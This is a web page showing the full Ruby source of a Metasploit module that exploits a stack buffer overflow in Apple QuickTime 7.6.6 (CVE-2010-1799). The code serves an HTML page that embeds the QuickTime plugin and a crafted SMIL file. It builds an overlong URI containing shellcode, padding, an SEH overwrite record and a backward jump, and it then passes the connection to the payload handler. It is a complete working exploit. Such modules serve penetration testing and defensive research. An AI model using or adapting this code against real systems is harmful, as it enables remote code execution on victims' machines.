Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb
19515 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = GoodRanking # needs more testing/targets to be Great
8
9
include Msf::Exploit::Remote::HttpServer::HTML
10
include Msf::Exploit::Seh
11
12
# include Msf::Exploit::Remote::BrowserAutopwn
13
# autopwn_info({
14
# :os_name => OperatingSystems::Match::WINDOWS,
15
# :javascript => true,
16
# :rank => NormalRanking, # reliable memory corruption
17
# :vuln_test => nil,
18
# })
19
20
def initialize(info = {})
21
super(
22
update_info(
23
info,
24
'Name' => 'Apple QuickTime 7.6.6 Invalid SMIL URI Buffer Overflow',
25
'Description' => %q{
26
This module exploits a buffer overflow in Apple QuickTime
27
7.6.6. When processing a malformed SMIL uri, a stack-based buffer
28
overflow can occur when logging an error message.
29
},
30
'Author' => [
31
'Krystian Kloskowski', # original discovery
32
'jduck' # Metasploit module
33
],
34
'License' => MSF_LICENSE,
35
'References' => [
36
[ 'CVE', '2010-1799' ],
37
[ 'OSVDB', '66636'],
38
[ 'BID', '41962' ],
39
[ 'URL', 'http://web.archive.org/web/20100729143247/http://secunia.com:80/advisories/40729' ],
40
[ 'URL', 'http://support.apple.com/kb/HT4290' ]
41
],
42
'DefaultOptions' => {
43
'EXITFUNC' => 'process',
44
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
45
},
46
'Payload' => {
47
'Space' => 640, # 716 - 63 - 8 - 5
48
'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40\x5c",
49
},
50
'Platform' => 'win',
51
'Targets' => [
52
# [ 'Automatic', { } ],
53
[
54
'Apple QuickTime Player 7.6.6',
55
{
56
'Ret' => 0x66801042 # p/p/r from QuickTime.qts (v7.66.71.0)
57
}
58
],
59
],
60
'Privileged' => false,
61
'DisclosureDate' => '2010-08-12',
62
'DefaultTarget' => 0,
63
'Notes' => {
64
'Reliability' => UNKNOWN_RELIABILITY,
65
'Stability' => UNKNOWN_STABILITY,
66
'SideEffects' => UNKNOWN_SIDE_EFFECTS
67
}
68
)
69
)
70
end
71
72
def on_request_uri(client, request)
73
return if ((p = regenerate_payload(client)) == nil)
74
75
if (request['User-Agent'] =~ /QuickTime/i or request.uri =~ /\.smil$/)
76
print_status("Sending exploit SMIL (target: #{target.name})")
77
78
# This is all basically filler on the browser target because we can't
79
# expect the SEH to be in a reliable place across multiple browsers.
80
# Heap spray ftw.
81
82
off = 716
83
start = "cHTTPDhlr_SetURL - url doesn't start with http:// or http1:// '"
84
85
scheme = rand_text_alphanumeric(5)
86
87
sploit = ''
88
sploit << scheme
89
sploit << "://"
90
91
# payload
92
sploit << p.encoded
93
94
# pad to SEH
95
sploit << rand_text_english(off - sploit.length - start.length)
96
97
# seh frame
98
sploit << generate_seh_record(target.ret)
99
100
# jmp back to payload
101
distance = off + 8 - (8 + start.length)
102
sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string
103
104
# force exception while writing
105
sploit << rand_text(1024) * 15
106
107
smil = %Q|<smil xmlns="http://www.w3.org/2001/SMIL20/Language">
108
<body>
109
<img src="#{sploit}" />
110
</body>
111
</smil>
112
|
113
send_response(client, smil, { 'Content-Type' => "application/smil" })
114
115
else
116
print_status("Sending initial HTML")
117
118
shellcode = Rex::Text.to_unescape(p.encoded)
119
url = ((datastore['SSL']) ? "https://" : "http://")
120
url << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(client.peerhost) : datastore['SRVHOST'])
121
url << ":" + datastore['SRVPORT'].to_s
122
url << get_resource
123
124
fname = rand_text_alphanumeric(4)
125
126
content = "<html><body>"
127
content << <<-ENDEMBED
128
<OBJECT
129
CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B"
130
WIDTH="1"
131
HEIGHT="1"
132
CODEBASE="http://www.apple.com/qtactivex/qtplugin.cab">
133
<PARAM name="SRC" VALUE = "#{url}/#{fname}.smil">
134
<PARAM name="QTSRC" VALUE = "#{url}/#{fname}.smil">
135
<PARAM name="AUTOPLAY" VALUE = "true" >
136
<PARAM name="TYPE" VALUE = "video/quicktime" >
137
<PARAM name="TARGET" VALUE = "myself" >
138
<EMBED
139
SRC = "#{url}/#{fname}.qtl"
140
QTSRC = "#{url}/#{fname}.qtl"
141
TARGET = "myself"
142
WIDTH = "1"
143
HEIGHT = "1"
144
AUTOPLAY = "true"
145
PLUGIN = "quicktimeplugin"
146
TYPE = "video/quicktime"
147
CACHE = "false"
148
PLUGINSPAGE= "http://www.apple.com/quicktime/download/" >
149
</EMBED>
150
</OBJECT>
151
ENDEMBED
152
content << "</body></html>"
153
154
send_response(client, content, { 'Content-Type' => "text/html" })
155
end
156
157
# Handle the payload
158
handler(client)
159
end
160
end
161
162